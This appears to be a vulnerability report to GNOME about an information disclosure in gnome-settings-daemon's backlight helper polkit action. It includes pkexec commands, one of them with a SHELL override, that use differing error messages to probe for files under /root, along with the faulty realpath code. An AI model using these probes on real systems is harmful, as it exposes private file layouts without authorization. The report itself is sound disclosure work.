Polkit policy for backlight helper discloses information on the system
Original reporter: Generation of Error Message in gsd-backlight-helper Leading to An Information Disclosure Vulnerability
Area: Application
Message
Hi,
I found a information disclosure vulnerability in the PolicyKit action org.gnome.settings-daemon.plugins.power.backlight-helper
user@ubuntu:~$ pkaction --verbose --action-id org.gnome.settings-daemon.plugins.power.backlight-helper
org.gnome.settings-daemon.plugins.power.backlight-helper:
description: Modify the laptop brightness
message: Authentication is required to modify the laptop brightness
vendor: GNOME Settings Daemon
vendor_url: http://git.gnome.org/browse/gnome-settings-daemon
icon: battery
implicit any: no
implicit inactive: no
implicit active: yes
annotation: org.freedesktop.policykit.exec.path -> /usr/libexec/gsd-backlight-helper
As above shows, an unprivileged attacker can execute /usr/libexec/gsd-backlight-helper
as root without authentication in an active session.
This binary needs two arguments. The first argument is the backlight directory and attackers can supply a full path to any arbitrary file. According to the error message, an unprivileged user can check for the existence of any files on the system as root. The following is an example:
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
$ pkexec /usr/libexec/gsd-backlight-helper /root/.bashrc 111
Error: Could not find the specified backlight "/root/.bashrc"
$ pkexec /usr/libexec/gsd-backlight-helper /root/not_exist 111
Error: Could not canonicalize given path (2: No such file or directory)
# some unprivileged user should set the $SHELL environment to run pkexec
$ id ; echo $SHELL
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
/usr/sbin/nologin
$ pkexec /usr/libexec/gsd-backlight-helper /root/.bashrc 111
The value for the SHELL variable was not found the /etc/shells file
This incident has been reported.
$ SHELL=/bin/sh pkexec /usr/libexec/gsd-backlight-helper /root/.bashrc 111
Error: Could not find the specified backlight "/root/.bashrc"
$ SHELL=/bin/sh pkexec /usr/libexec/gsd-backlight-helper /root/not_exist 111
Error: Could not canonicalize given path (2: No such file or directory)
I paste the vulnerable code below(https://github.com/GNOME/gnome-settings-daemon/blob/master/plugins/power/gsd-backlight-helper.c#L88-L93). When the attackers-controlled file doesn't exist, realpath
will return NULL
, thus results in a different error message when the file exists.
device = realpath (argv[1], NULL);
if (device == NULL) {
fprintf (stderr, "Error: Could not canonicalize given path (%d: %s)\n", errno, strerror (errno));
result = GSD_BACKLIGHT_HELPER_EXIT_CODE_FAILED;
goto done;
}
Here is my test environment:
user@ubuntu:~$ lsb_release -rd
Description: Ubuntu 20.04.2 LTS
Release: 20.04
user@ubuntu:~$ apt-cache policy gnome-settings-daemon
gnome-settings-daemon:
Installed: 3.36.1-0ubuntu1
Candidate: 3.36.1-0ubuntu1
Version table:
*** 3.36.1-0ubuntu1 500
500 http://mirrors.ustc.edu.cn/ubuntu focal-updates/main amd64 Packages
100 /var/lib/dpkg/status
3.36.0-1ubuntu2 500
500 http://mirrors.ustc.edu.cn/ubuntu focal/main amd64 Packages
Best Regards,
Aobo Wang
Chaitin Tech.